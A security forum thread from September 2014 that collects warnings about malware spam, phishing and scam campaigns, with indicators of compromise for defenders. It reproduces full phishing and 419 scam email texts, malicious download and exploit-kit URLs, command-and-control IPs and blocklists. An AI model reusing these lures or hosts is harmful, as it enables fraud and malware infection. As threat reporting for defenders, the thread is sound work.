178.62.254.78: https://www.virustotal.com/en-gb/ip-address/178.62.254.78/information/
___

Fake Employee Important Address UPDATE/SPAM – PDF malware
- http://myonlinesecurity.co.uk/employees-important-address-update-fake-pdf-malware/
11 Sep 2014 - "'To All Employee’s – Important Address UPDATE' which pretends to come from Administrator at your own domain is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
To All Employee’s:
The end of the year is approaching and we want to ensure every employee receives their W-0 to the correct address. Verify that the address is correct... If changes need to be made, contact HR .. Administrator ...

11 September 2014: Documents.zip: Extracts to: Documents.scr
Current Virus total detections: 0/53* ... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
*https://www.virustotal.com/en/file/687c7d8030b9f15bd2ef857116ef8c0c6fe83aa998ff32dab406beb0d4e759c2/analysis/1410456657/

- http://blog.dynamoo.com/2014/09/to-all-employees-important-address.html
11 Sep 2014 - "This -fake- HR spam leads to a malicious ZIP file:
From: Administrator [administrator@ victimdomain .com]
Date: 11 September 2014 22:25
Subject: To All Employee's - Important Address UPDATE
To All Employee's:The end of the year is approaching and we want to ensure every employee receives their W-5 to the correct address. Verify that the address is correct... If changes need to be made, contact HR...

The link in the email goes to the same site as described in this earlier post*, which means that the payload is Cryptowall."
* http://blog.dynamoo.com/2014/09/efax-spam-leads-to-cryptowall.html
___

Fake picture or video SPAM – jpg malware
- http://myonlinesecurity.co.uk/new-picture-video-message-fake-jpg-malware/
11 Sep 2014 - "'A new picture or video' message pretending to come from getmyphoto@ vodafone .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The attachment file names are so far all the same and it extracts to a fake windows short cut file .pif Even setting show file extensions will, not show the .pif extension in windows 8 and the unzipped file will look like a genuine windows short cut, so you need to be especially wary and cautious. See below:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/pif-not-showing.png
The email looks like:
You have received a picture message from mobile phone number +447586595142 picture
Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service

There is a second version of this email doing the rounds today. Instead of an attachment it has a link to a compromised/ infected/newly created malware pushing site where it automatically tries to download the malware in a zip file.
You have received a picture message from mobile phone number +447557523496 click here to view picture message
Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service

... there will be hundreds of different sites. The zip was 90837744-2014_481427.zip which extracts to 90837744-2014_481427.scr which has the same # and detection rate as the pif file earlier submitted to virus total*

11 September 2014: IMG_00005_09112014.jpeg.zip : Extracts to: IMG_00005_09112014.jpeg.pif
Current Virus total detections:4/53** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper jpg file instead of the .pif ( windows shortcut) file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1425dcfbe06fa76c7b1e491e4573afedd2a867e50650b9ad70e90ae872024821/analysis/1410430034/

** https://www.virustotal.com/en/file/1425dcfbe06fa76c7b1e491e4573afedd2a867e50650b9ad70e90ae872024821/analysis/1410427007/
___

Fake 'new order' SPAM – PDF malware
- http://myonlinesecurity.co.uk/new-order-fake-pdf-malware/
11 Sep 2014 - "'new order' pretending to come from random names at live .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has various subjects, including new order, new invoice, FWD:invoice, FWD Order... The attachment file names are so far all the same and it extracts to a -fake- windows short cut file .pif . Even setting show file extensions will -not- show the .pif extension in windows 8 and the unzipped file will look like a genuine windows short cut, so you need to be especially wary and cautious. See below:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/pif-not-showing.png
The email looks like:
Warmest regards,
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/new-order.png

11 September 2014: 2014.09.11.zip : Extracts to: 2014.09.11.pdf.pif
Current Virus total detections: 4/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .pif ( windows shortcut) file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustotal.com/en/file/1425dcfbe06fa76c7b1e491e4573afedd2a867e50650b9ad70e90ae872024821/analysis/1410427007/

:mad::mad: :fear:

FYI...

Fake Invoice SPAM - contains malicious VBS script
- http://blog.mxlab.eu/2014/09/12/fake-email-copie-facture-societe-lws-fc-contains-malicvious-vbs-script/
Sep 12, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “[COPIE FACTURE SOCIETE LWS FC-408185] – [LWS INVOICE] 10/09/2014″. This email is sent from the spoofed address “Service clients LWS <noreply@ lws .com>” and has the following body:
S.A.R.L LWS
4, rue galvani
75838 PARIS Cedex 17
Paris le, 10/09/2014
Veuillez trouver en pièce jointe votre facture de référence: facture FC-408185 (Fichier: facture-408185) au format ZIP.
Si vous n’avez pas WinRar (Logiciel permettant de lire les fichiers ZIP) vous pouvez le télécharger ici:
http ://www .rarlab .com/download.htm
Merci pour la confiance que vous nous accordez,
Le service comptabilité LWS ...

The attached ZIP file has the name FACTURE_45871147.zip and contains the 4 kB large file FACTURE_45871147.vbs. the VBS script in fact is encoded to hide the real purpose but it seems that this script will download other malicious files and will install them on a system in order to infect the computer. The trojan is known as Trojan.Script.Crypt.deehcf or VBS/Dloadr-DVY. At the time of writing, 2 of the 53* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/adf506eebd74dbdd2e23ab2a0918912a95105745226302cca32c760c34d196a5/analysis/
___

Fake Household Improvement SPAM - Zbot Malware
- https://blog.malwarebytes.org/fraud-scam/2014/09/household-improvement-emails-come-with-zbot-malware/
Sep 12, 2014 - "... malicious email in circulation at the moment which claims to contain an invoice from a Kitchen Appliance company. According to another recipient of the mail*, the named company is actually a real business entity although there’s no suggestion that they’ve been hacked or otherwise compromised – it seems the scammers just opened up a directory, said “That one” and just started pretending to be them. The mail reads as follows:
Screenshot: https://blog.malwarebytes.org/wp-content/uploads/2014/09/kitchens1.jpg
... The email comes with a .zip attachment, which contains a piece of Malware known as Zbot. Zeus (aka Zbot) is something to be avoided, as it can lead to banking password theft, form grabbing, keystroke logging and also Ransomware. The zip contains an executable made to look like a Word .doc file, which is a trick as old as the hills yet extremely effective where catching people out is concerned. Telling Windows to display known file extensions will help to avoid this particular pitfall... we detect this as Trojan.Spy.Zbot, and the current Virus Total scores currently clock in at 29/54**... there’s another mail*** doing the rounds which spoofs the same email address mentioned above, yet claims to be sent from a toiletries company. If you’ve bought any form of kitchen / household upgrade or addition recently and receive mails with zipped invoices, you may not recall exactly who you bought all of your items from. With that in mind, you may wish to have a look at your receipts and bank statements, and – on the off chance the randomly selected company named in the spam mails matches up – give them a call directly to confirm they really did send you something. There’s a good chance they probably didn’t..."
* http://myonlinesecurity.co.uk/m-m-kitchen-appliances-inv211457-fake-word-doc-malware/

** https://www.virustotal.com/en/file/941434a32431048380956c6bb7c6be5fd4105ac397eb8c46011d27e827014f73/analysis/

*** http://blog.mxlab.eu/2014/09/12/fake-email-with-attached-invoice-from-broad-oak-toiletries-ltd-contains-trojan/
___

Data Breaches and PoS RAM Scrapers
- http://blog.trendmicro.com/trendlabs-security-intelligence/2014-an-explosion-of-data-breaches-and-pos-ram-scrapers/
Sep 11, 2014 - "... Ever since the Target data breach came into the limelight, there has been a constant stream merchants/retailers publicly disclosing data breach incidents. These data breaches typically involve credit card data theft using PoS RAM scrapers. Early this month, Brian Krebs reported yet another big data breach that involves U.S. retailer Home Depot using a new variant of the BlackPOS PoS RAM scraper. Nearly all Home Depot locations in the US are believed to have been affected and it is speculated this data breach might surpass the Target breach in terms of volume of data stolen. In addition to an increased number of data breaches, 2014 also brings an increase in the number of new PoS RAM scraper families. Our PoS RAM scraper family tree illustrates the evolution as follows:
Evolution of the PoS RAM scraper family
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/Figure-3-01.png
... Of the six new variants discovered in 2014, four were discovered between June and August.
- Soraya – discovered in June and is a Dexter- and ZeuS-inspired malware. In addition to scraping RAM for credit card Tracks 1 and 2 data, it borrows tricks from ZeuS for hooking the NtResumeThread API, and injects itself into all new processes. It also borrows ZeuS’s form-grabbing functionality and hooks the browser’s HTTP POST function. Trend Micro detects Soraya variants as TSPY_SORAYA.A.
- BrutPOS – discovered in July and appears to have borrowed functionality from a BlackPOS variant. It attempts to exploit PoS systems that use weak or default passwords and has open Remote Desktop Protocol (RDP) ports. BrutPOS will brute-force the login:password combinations to gain entry into the system. Trend Micro detects BrutPOS variants as TROJ_TIBRUN.B and TROJ_TIBRUN.SM.
- Backoff – discovered in July is a successor of Alina. It implements an updated data search function and drops a watchdog process that ensures Backoff is always running on the system. The cybercriminals use publicly available tools to brute-force entry into RDP applications on PoS systems and installs Backoff. Trend Micro detects Backoff variants as TSPY_POSLOGR.A, TSPY_POSLOGR.B, and TSPY_POSLOGR.C.
- BlackPOS ver 2.0 – discovered in August, clones the exfiltration technique that the BlackPOS variant used to compromise U.S. retailer Target. BlackPOS ver 2.0 also adds a unique feature where it pretends to be an AV product installed on the system to avoid drawing unwanted attention to itself. Reports indicate that this malware appears to have been used in the latest big data breach targeting Home Depot. Trend Micro detects BlackPOS ver 2.0 variants as TSPY_MEMLOG.A..."

:mad: :fear:

FYI...

Phish - Paypal ...
- http://myonlinesecurity.co.uk/paypal-account-will-limited-hear-phishing/
14 Sep 2014 - "'Paypal Your account will be limited until we hear from you' pretending to come from service_paypal=cczazmam .com@ wpengine .com; on behalf of; service_paypal@ cczazmam .com. There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card... The original email looks like this. It will NEVER be a genuine email from PayPal or Your Bank so don’t ever follow the links in the email...
PayPal account information :
Hello,
Dear PayPal user ,
Your account will be limited if you not confirm it .
Need Assistance?
Some information on your account appears to be missing or incorrect.
Please update your account promptly so that you can continue to enjoy
all the benefits of your PayPal account.
If you don’t update your account within 37 days, we’ll limit what you can do with your PayPal account.
Please Login to confirm your information :
http ://rangeviewrentals .com//wp-content/themes/twentytwelve/wester.html
Reference Number: PP-003-211-347-423
Yours sincerely,
PayPal

This particular phishing campaign starts with an email with a link. In this case to a hacked compromised website, which looks nothing like any genuine PayPal page:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/rangeview_paypal_phishing-scam.png
This one wants your personal details, your Paypal account log in details and your credit card and bank details and your email log in details . Many of them are also designed to specifically steal your facebook and other social network log in details..."

:fear: :mad:

FYI...

Fake Termination SPAM – malware
- http://myonlinesecurity.co.uk/termination-due-policy-violation-malware/
15 Sep 2014 - "There can’t be a much more alarming email to open first thing on a Monday Morning than one that pretends to say that you have been fired... 'Termination due to policy violation #33205939124' pretending to come from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Today’s email template attaches an arj file. This sort of compressed file is rarely used nowadays and many popular zip file programs will not automatically extract them. -Any- email received with an ARJ attachment should be immediately -deleted- . NO legitimate company or program ever uses that form of compression nowadays. To make it even harder to quickly detect, all the attachments are randomly named and extract to a different randomly named file and each one has a totally different SH1 or MD5#. Loads of slightly different subjects with this one, including
Policy violation #59892665326
Termination due to policy violation #33205939124
Termination #59147901198
All the alleged infringements or violations have different numbers... The email looks like:
Hello,
We regret to inform you that your employment with A&M Defence & Marine Services Ltd is being terminated. Your termination is the result of the following violations of company policy:
- 0A4 44 12.09.2011
- 0A4 46 12.09.2011
- 0A4 85 12.09.2011
You were issued written warnings on 19.08.2014. As stated in your final warning, you needed to take steps to correct your behavior by 15.09.2014. Your failure to do so has resulted in your termination. To appeal this termination, you must return written notification of your intention to appeal to Wynona Kinnare in A&M Defence & Marine Services Ltd no later than 06:00PM on 21.09.2014.
Sincerely,
Pauletta Stephens ...

15 September 2014: disturbance_2014-09-15_08-38-12_33205939124.arj:
Extracts to: disturbance_2014-09-15_08-38-12_33205939124.exe
Current Virus total detections: 3/53* . This 'Termination due to policy violation #33205939124' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/eb62d2fc255b934706b15eb5fa4f07fdf3a900810820ef60db62b77de1d4c4ef/analysis/
... Behavioural information
TCP connections:
187.45.193.139: https://www.virustotal.com/en/ip-address/187.45.193.139/information/
213.186.33.87: https://www.virustotal.com/en/ip-address/213.186.33.87/information/
23.62.99.33: https://www.virustotal.com/en/ip-address/23.62.99.33/information/
66.96.147.117: https://www.virustotal.com/en/ip-address/66.96.147.117/information/
UDP communications:
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

LinkedIn feature exposes Email Addresses
- http://krebsonsecurity.com/2014/09/linkedin-feature-exposes-email-addresses/
Sep 15, 2014 - "One of the risks of using social media networks is having information you intend to share with only a handful of friends be made available to everyone. Sometimes that over-sharing happens because friends betray your trust, but more worrisome are the cases in which a social media platform itself exposes your data in the name of marketing... According to researchers at the Seattle, Wash.-based firm Rhino Security Labs, at the crux of the issue is LinkedIn’s penchant for making sure you’re as connected as you possibly can be. When you sign up for a new account, for example, the service asks if you’d like to check your contacts lists at other online services (such as Gmail, Yahoo, Hotmail, etc.). The service does this so that you can connect with any email contacts that are already on LinkedIn, and so that LinkedIn can send invitations to your contacts who aren’t already users... Rhino Security founders Benjamin Caudill and Bryan Seely have a recent history of revealing how trust relationships between and among online services can be abused to expose or divert potentially sensitive information... In an email sent to this reporter last week, LinkedIn said it was planning at least two changes to the way its service handles user email addresses..."
(More at the krebsonsecurity URL above.)
___

Fake Overdue invoice SPAM - malicious .arj attachment
- http://blog.dynamoo.com/2014/09/overdue-invoice-6767390-spam-has.html
15 Sep 2014 - "This -fake- invoice email has a malicious attachment:
From: Mauro Reddin
Date: 15 September 2014 10:32
Subject: Overdue invoice #6767390
Morning,
I was hoping to hear from you by now. May I have payment on invoice #84819995669 today please, or would you like a further extension?
Best regards,
Mauro Reddin ...

The attachment is an archive file invc_2014-09-15_15-07-11_6767390.arj so in order to get infected you would need an application capable of handling ARJ archives. Once unpacked, there is a malicious executable called invc_2014-09-15_15-07-11_88499270.exe which has a VirusTotal detection rate of just 1/55*... recommend that you apply the following blocklist (Long list at the dynamoo URL above.) ..."
* https://www.virustotal.com/en-gb/file/c21b719a9cf4c5aa9d8927c185be4181d7c465b01fa85e38c7a3d459930e2203/analysis/1410773681/
___

Fake Sage 'Outdated Invoice' SPAM ...
- http://blog.dynamoo.com/2014/09/sage-outdated-invoice-spam_15.html
15 Sep 2014 - "... another -fake- Sage email leading to malware:

Screenshot: http://4.bp.blogspot.com/-knPfcbJT0Q4/VBbJyysrTNI/AAAAAAAAFnI/YbEjR56dgRU/s1600/sage.png

... This ZIP file contains a malicious executable Invoice18642.scr which has a VirusTotal detection rate of just 1/55*. The ThreatTrack report... shows that it attempts to communicate with the following resources:
188.165.204.210/1509uk1/NODE01/0/51-SP3/0/
188.165.204.210/1509uk1/NODE01/1/0/0/
green-fuel .us/upload/box/1509uk1.ltc
www .green-fuel .us/upload/box/1509uk1.ltc
Recommended blocklist:
188.165.204.210
green-fuel .us
petitepanda .net
florensegoethe .com.br
coursstagephoto .com
vicklovesmila .com
flashsavant .com"
* https://www.virustotal.com/en/file/90ad158dd663e0bfc1f848d8a00890dbd9a24618d7a25d377d9de6baac0b61f4/analysis/1410779812/
___

Fake 'secure' NatWest SPAM – PDF malware
- http://myonlinesecurity.co.uk/received-new-secure-message-natwest-fake-pdf-malware/
15 Sep 2014 - "'You have received a new secure message from NatWest' pretending to come from NatWest <secure@natwest.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
[ NatWest logo ]
You have a new private message from NatWest
To view/read this your secure message please click here
Email Encryption Provided by NatWest. Learn More.
Email Security Powered by Voltage IBE
Copyright 2014 National Westminster Bank Plc. All rights reserved.
Footer Logo NatWest
To unsubscribe please click here ...

15 September 2014: SecureMessage.zip ( 8kb) : Extracts to: SecureMessage.scr
Current Virus total detections: 1/55* . This 'You have received a new secure message from NatWest' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/90ad158dd663e0bfc1f848d8a00890dbd9a24618d7a25d377d9de6baac0b61f4/analysis/1410779812/

- http://threattrack.tumblr.com/post/97567721558/natwest-secure-message-spam
Sep 15, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/65aed37f33dcaf8e16e0b2e828d4f53e/tumblr_inline_nby6ovZu2c1r6pupn.png
___

Phish - LLoyds 'Secure' SPAM...
- http://myonlinesecurity.co.uk/lloyds-bank-new-secure-message-phishing/
15 Sep 2014 - "There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying some thing like:
- There have been unauthorised or suspicious attempts to log in to your account, please verify
- Your account has exceeded its limit and needs to be verified
- Your account will be suspended !
- You have received a secure message from < your bank>
- New Secure Message
- We are unable to verify your account information
- Update Personal Information
- Urgent Account Review Notification
- We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
- Confirmation of Order
This one is 'LLoyds bank New Secure Message' pretending to come from Eli.Ray@ lloydsbank .com or David.Ricard@ lloydsbank .com... Email looks like:
[ Lloyds TSB logo ]
(New users may need to verify their email address)
If you do not see or cannot click “Read Message” / click here
Desktop Users:
You will be prompted to open (view) the file or save (download) it to your computer. For best results, click Read Message button.
Mobile Users:
Install the mobile application.
Protected by the Voltage SecureMail Cloud
SecureMail has a NEW LOOK to better support mobile devices!
Disclaimer: This email and any attachments are confidential and for the sole use of the recipients. If you have received this email in error please notify the sender...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/lloyds_bank_secure_message.png

This one wants your personal details and bank details..."
___

Fake Fax SPAM - malware attachment
- http://myonlinesecurity.co.uk/received-fax-fake-pdf-malware/
15 SEP 2014 - "'You have received a fax' pretending to come from fax .co.uk <fax@ documents55 .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You have received a new fax. This fax was received by Fax Server.
The fax has been downloaded to dropbox service (Google Inc).
To view your fax message, please download from the link below. It’s
operated by Dropbox and safety...
Received Fax Details
Received on:1 5/09/2014 10:14 AM
Number of Pages: 1 ...

15 September 2014: Docs0972.zip ( 8kb): Extracts to: Docs0972.scr
Current Virus total detections: 0/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/bec0ac2711f99f90f27a29a9e021bedfede02c139f26dcfae36e2d8895babf52/analysis/1410804563/
___

Twitch users shook by money spending malware
- http://www.theinquirer.net/inquirer/news/2367489/twitch-users-shook-by-money-spending-malware
15 Sep 2014 - "... F-Secure has warned gamers that the Twitch video streaming service has been hit with malware that can spend users' money. The firm revealed its concerns in a blog post on Friday*, shining a dark light on the new gaming console darling and its role in the world of Steam. F-Secure said that an alarmed Twitch user - not Amazon - approached it with some concerns, explaining that a lure in the Twitch chat feature offers access to a raffle. We all know what can and usually does follow the clicking an unsolicited link, and that is the start of a one-way trip to malware. This link, which purports to offer gaming gewgaws, is yet another lie, said F-Secure. It explained that a "Twitch-bot" account "bombards" the chat feature and tickles users with its lure..."
More detail here:
* http://www.f-secure.com/weblog/archives/00002742.html

:fear::fear: :mad:

FYI...

Fake 'Payments' SPAM ...
- http://blog.mxlab.eu/2014/09/16/trojan-genvariant-graftor-155439-present-in-fake-emails-regarding-payments/
Sep 16, 2014 - "... intercepted different campaigns where the trojan Gen:Variant.Graftor.155439 is present in the attached ZIP archive. The trojan is known as Gen:Variant.Graftor.155439 by most AV engines but it’s also known as Trojan/Win32.Zbot, HW32.Paked.1F59, Generic-FAUS!BA7599C952BE or PE:Malware.XPACK-HIE/Heur!1.9C48. The first email comes with the subject “Re: today payment done” is sent from a spoofed address and has the following body:
Dear sir,
Today we have able to remit the total amount of US$ 51,704.97 to your account. Details of our payments are as follows:
Cont. #41 SPV001/APR/13 US$34,299.13 – 11,748.82 (50% disc. For R008 & R016) =
Cont. #42 EXSQI013/MAY/13 US$29,154.66
Total Remittance: US$ 51,704.97
Attached is the TT copy, check with your bank and let us know when you will proceed with shipment.
Thank you very much.
Best regards,
Me

The attached ZIP file has the name swift copy.zip and contains the swift copy.scr file. At the time of writing, 11 of the 54 AV engines did detect the trojan at Virus Total*...
* https://www.virustotal.com/en/file/db9eb842deb7cbda56c3df7c1e198fac5f0d65d0d8ef9df2f13618d18416c686/analysis/
The second email comes with the subject “Re: Balance payment” is sent from a spoofed address and has the following body:
The attached TT copy is issued at the request of our customer. The advice is for your reference only.
Yours faithfully,
Global Payments and Cash Management
Bank of America (BOA)
This is an auto-generated email, please DO NOT REPLY. Any replies to this
email will be disregarded...

The attached ZIP file has the name original copy.zip and contains the original copy.scr file. At the time of writing, 12 of the 55 AV engines did detect the trojan at Virus Total**..."
** https://www.virustotal.com/en/file/f7f1b10365b995c308d1cc4a3f025e5e7f249fbfee82f7bcd8297e1c5fcc1635/analysis/
___

Fake 'My new photo ;)' SPAM - malware attachment
- http://blog.mxlab.eu/2014/09/16/email-my-new-photo-contains-a-variant-of-trojan-win32-swizzor-2o-trojan/
Sep 16, 2014 - "... intercepted a new trojan variant distribution campaign by email with the subject “My new photo ;)”. This email is sent from a spoofed address and has the following short body in very poor English:
my new photo ;)
if you like my photo to send me u photo

The attached ZIP file has the name photo.zip, once extracted a folder photo is available with that contains the 127 kB large file photo.exe. The trojan is known as a variant of Trojan.Win32.Swizzor.2!O. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/83d322707828350ba51301b1a0d02ee0c831b88bb9722036ade2b7d8827817cb/analysis/
... Behavioural information
TCP connections:
131.253.40.1: https://www.virustotal.com/en/ip-address/131.253.40.1/information/
137.254.60.32: https://www.virustotal.com/en/ip-address/137.254.60.32/information/
134.170.188.84: https://www.virustotal.com/en/ip-address/134.170.188.84/information/
157.56.121.21: https://www.virustotal.com/en/ip-address/157.56.121.21/information/
91.240.22.62: https://www.virustotal.com/en/ip-address/91.240.22.62/information/
___

Fake USPS SPAM - word doc malware
- http://myonlinesecurity.co.uk/usps-postal-notification-service-fake-word-doc-malware/
16 Sep 2014 - "'USPS Postal Notification Service' pretending to come from USPS is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/usps-postal-notification-service.png

16 September 2014: Label.zip ( 82 kb): Extracts to: Label.exe
Current Virus total detections: 20/54* . This USPS Postal Notification Service is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft Word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/6678ff966e942e4bf669d8a240acbab79971c871152f3c16478a3ec0c3f5c805/analysis/1410841682/
___

Fake 'inovice' SPAM ...
- http://blog.dynamoo.com/2014/09/inovice-0293991-september-spam.html
16 Sep 2014 - "This spam mis-spells "invoice" in the subject line, and has an .arj file attached that contains a malicious binary.
Example subjects:
inovice 8958508 September
inovice 7682161 September
inovice 4868431 September
inovice 0293991 September
Body text:
This email contains an invoice file attachment

The name of the attachment varies, but is in the format invoice_8958508.arj which contains a malicious executable invoice_38898221_spt.exe which has a VirusTotal detection rate of just 3/54*. The ThreatTrack report...and Anubis report show a series a DGA domains... that are characteristic of Zbot, although none of these domains are currently resolving. If your organisation can -block- .arj files at the mail perimeter then it is probably a good idea to do so."
* https://www.virustotal.com/en-gb/file/ee43410ecaba583a03eb3cfbf1af1afb38a5f25cd8742b47372b853d83fc7089/analysis/1410860283/
... Behavioural information
TCP connections:
208.91.197.27: https://www.virustotal.com/en/ip-address/208.91.197.27/information/
___

Fake FAX SPAM... again
- http://blog.dynamoo.com/2014/09/youve-received-new-fax-spam.html
16 Sep 2014 - "... a facsimile transmission...
From: Fax
Date: 16 September 2014 11:05
Subject: You've received a new fax
New fax at SCAN0204102 from EPSON by ...
Scan date: Tue, 16 Sep 2014 15:35:59 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can download your fax message at: ...
(Google Disk Drive is a file hosting service operated by Google, Inc.) ...

The link is so obviously not anything to do with Google. Clicking on it loads another script from triera .biz.ua/twndcrfbru/zjliqkgppi.js which in turn downloads a ZIP file from www .yerelyonetisim .org.tr/pdf/Message_2864_pdf.zip which has a VirusTotal detection rate of 3/55*. This malware then phones home... Recommended blocklist:
188.165.204.210
brisamarcalcados .com.br
triera .biz.ua
yerelyonetisim .org.tr
ngujungwap .mobi.ps "
* https://www.virustotal.com/en-gb/file/8f0aab0abbbe1519dadff8bc206568b144dfd36b605be090fe3098898e926832/analysis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
198.143.152.226: https://www.virustotal.com/en/ip-address/198.143.152.226/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake forgeries 'Copied invoices' SPAM
- http://blog.dynamoo.com/2014/09/kifilwe-shakong-copied-invoices-spam.html
16 Sep 2014 - "Kifilwe Shakong is a real person who works for Cashbuild in South Africa. She is not the person sending these messages, they are forgeries. Cashbuild's systems have not been compromised in any way. As you might guess, these messages have a malicious attachment.
From: Kifilwe Shakong [kshakong@ cashbuild .co.za]
Date: 16 September 2014 12:17
Subject: Copied invoices
The attached invoices are copies. We will not be able to pay them. Please send clear invoices.
This outbound email has been scanned by the IS Mail Control service.
For more information please visit http ...
The attached invoices are copies. We will not be able to pay them. Please send clear invoices...

Attached is a file with a filename in the format SKMBT_75114091015230.zip which in turn contains a malicious executable SKMBT_75114091015230.exe which has a very low detection rate at VirusTotal of just 1/54*... the malware attempts to phone home to the following domains and IPs which are worth blocking:
golklopro .com
94.100.95.109
31.134.29.175
176.213.10.114
176.8.72.4
176.99.191.49
78.56.92.46
195.114.159.232
46.98.234.76
46.185.88.110
46.98.122.183
46.211.198.56
195.225.147.101
176.53.209.231 ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/e324d73b36f1fd31c53f6ae21457c2fd57f90be56dcd776efbe06b01fdaf3d5d/analysis/1410866733/
... Behavioural information
DNS requests
golklopro .com
cosjesgame .su
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake 'Unpaid invoice' SPAM - leads to Angler Exploit Kit
- http://blog.dynamoo.com/2014/09/unpaid-invoice-notification-spam-leads.html
16 Sep 2014 - "This convincing-looking but -fake- spam leads to an exploit kit.
From: Christie Foley [christie.foley@ badinsky .sk]
Reply-to: Christie Foley [christie.foley@ badinsky .sk]
Date: 16 September 2014 13:55
Subject: Unpaid invoice notification ...

Screenshot: https://1.bp.blogspot.com/-4dVURai9zaE/VBg551t4f-I/AAAAAAAAFoA/l2blM5UgsbU/s1600/invoice.png

The link in the email goes to:
[donotclick]tiragreene .com/aspnet_client/system_web/4_0_30319/invoice_unn.html
Which in turn goes to an Angler EK landing page at:
[donotclick]108.174.58.239:8080 /wn8omxftff
You can see the URLquery report for the EK here*. I would strongly recommend blocking web traffic to 108.174.58.239 (ColoCrossing, US)."
* http://urlquery.net/report.php?id=1410873578924

- http://myonlinesecurity.co.uk/notification-amount-overdue-recent-invoice-java-exploit-malware/
16 Sep 2014
___

Fake 'PAYMENT SCHEDULE' email - 419 SCAM
- http://myonlinesecurity.co.uk/reyour-payment-schedule-pretending-come-dr-mrs-ngozi-o-iweala/
16 Sep 2014 - "'RE:YOUR PAYMENT SCHEDULE' pretending to come from Dr Mrs Ngozi O. Iweala is a -scam- . After all the current batches of very nasty and tricky malware being attached to emails or as links in emails, it really is a change to see a good old fashioned 419 scam:
Attn:Beneficiary,
My name is Mrs Ngozi Okonjo Iweala,I am the current minister of finance of Nigeria.
Your payment file has been in our desk since two weeks ago and Mr.Croft from Australia submitted claims on your funds stating that
you have given him the authority to claim the funds but we stopped him first until we receive a confirmation from any of you. You are
therefore requested to get back to us to confirm the authenticity of the application of claim submitted by Mr Croft or if you did not
authorized him for any reason,urgently get back to us so that we can direct you on how you are going to receive your fund via Automated
Teller Machine System( ATM CARD).
Please,response back with all your full details mostly your confidential address where you will have the ATM card delivered to you. Your urgent response is highly needed.
Reply also to : fminister88 @gmail .com
Your faithfully.
Dr Mrs Ngozi O. Iweala.
Finance Of Minister.

[Arrgghh...]
___

Fake Nat West SPAM - PDF malware
- http://myonlinesecurity.co.uk/nat-west-bacs-transfer-remittance-jsag828gbp-fake-pdf-malware/
16 Sep 2014 - "'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
We have arranged a BACS transfer to your bank for the following amount : 4933.00
Please find details at our secure link below: ...

